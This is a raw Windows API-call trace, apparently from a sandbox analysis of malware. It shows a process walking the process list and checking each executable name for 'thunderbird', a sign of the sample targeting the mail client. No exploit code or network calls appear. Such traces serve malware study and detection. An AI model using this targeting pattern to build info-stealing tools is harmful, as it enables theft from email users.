WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.783] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c6a8 [0099.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c6a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.783] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.783] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.783] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.936] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c6c0 [0099.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x357c6c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0099.936] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0099.936] StrStrIA (lpFirst="spoolsv.exe", lpSrch="thunderbird") returned 0x0 [0099.936] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.937] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c810 [0099.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.938] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.938] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.938] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.939] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c7e0 [0099.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x357c7e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0099.939] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0099.939] StrStrIA (lpFirst="audiodg.exe", lpSrch="thunderbird") returned 0x0 [0099.940] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0099.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.941] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c7f8 [0099.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x357c7f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0099.941] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0099.941] StrStrIA (lpFirst="sihost.exe", lpSrch="thunderbird") returned 0x0 [0099.941] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.943] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c6d8 [0099.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c6d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.943] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.943] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.944] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c6f0 [0099.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357c6f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.944] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.944] StrStrIA (lpFirst="taskhostw.exe", lpSrch="thunderbird") returned 0x0 [0099.944] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.946] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c828 [0099.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x357c828, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0099.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0099.946] StrStrIA (lpFirst="explorer.exe", lpSrch="thunderbird") returned 0x0 [0099.946] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0099.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.947] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357dc08 [0099.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357dc08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0099.947] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0099.947] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="thunderbird") returned 0x0 [0099.948] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0099.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0099.949] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356bdc0 [0099.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356bdc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0099.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0099.949] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="thunderbird") returned 0x0 [0099.949] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0099.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.950] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357dc68 [0099.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357dc68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0099.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0099.951] StrStrIA (lpFirst="Memory Compression", lpSrch="thunderbird") returned 0x0 [0099.951] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0099.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0099.952] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357daa8 [0099.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357daa8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0099.952] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0099.952] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="thunderbird") returned 0x0 [0099.952] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0099.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.953] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c888 [0099.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x357c888, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0099.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0099.953] StrStrIA (lpFirst="SearchUI.exe", lpSrch="thunderbird") returned 0x0 [0099.953] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0099.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.954] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357dc28 [0099.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357dc28, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0099.954] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0099.954] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="thunderbird") returned 0x0 [0099.954] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.955] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c858 [0099.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357c858, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0099.955] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0099.955] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="thunderbird") returned 0x0 [0099.955] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0099.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.957] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c870 [0099.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x357c870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0099.957] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0099.957] StrStrIA (lpFirst="pending.exe", lpSrch="thunderbird") returned 0x0 [0099.957] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0099.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0099.958] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356c040 [0099.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356c040, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0099.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0099.959] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="thunderbird") returned 0x0 [0099.959] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0099.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.960] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d8e8 [0099.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357d8e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0099.960] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0099.960] StrStrIA (lpFirst="swing prefer.exe", lpSrch="thunderbird") returned 0x0 [0099.960] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0099.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0099.961] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356bd70 [0099.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356bd70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0099.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0099.961] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="thunderbird") returned 0x0 [0099.961] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0099.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.962] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d9e8 [0099.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357d9e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0099.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0099.962] StrStrIA (lpFirst="nights-attending.exe", lpSrch="thunderbird") returned 0x0 [0099.962] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0099.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.963] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c5b8 [0099.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x357c5b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0099.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0099.963] StrStrIA (lpFirst="installed.exe", lpSrch="thunderbird") returned 0x0 [0099.963] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0099.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0099.965] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356c220 [0099.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356c220, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0099.965] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0099.965] StrStrIA (lpFirst="references compounds.exe", lpSrch="thunderbird") returned 0x0 [0099.965] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0099.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.966] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357da28 [0099.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357da28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0099.966] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" 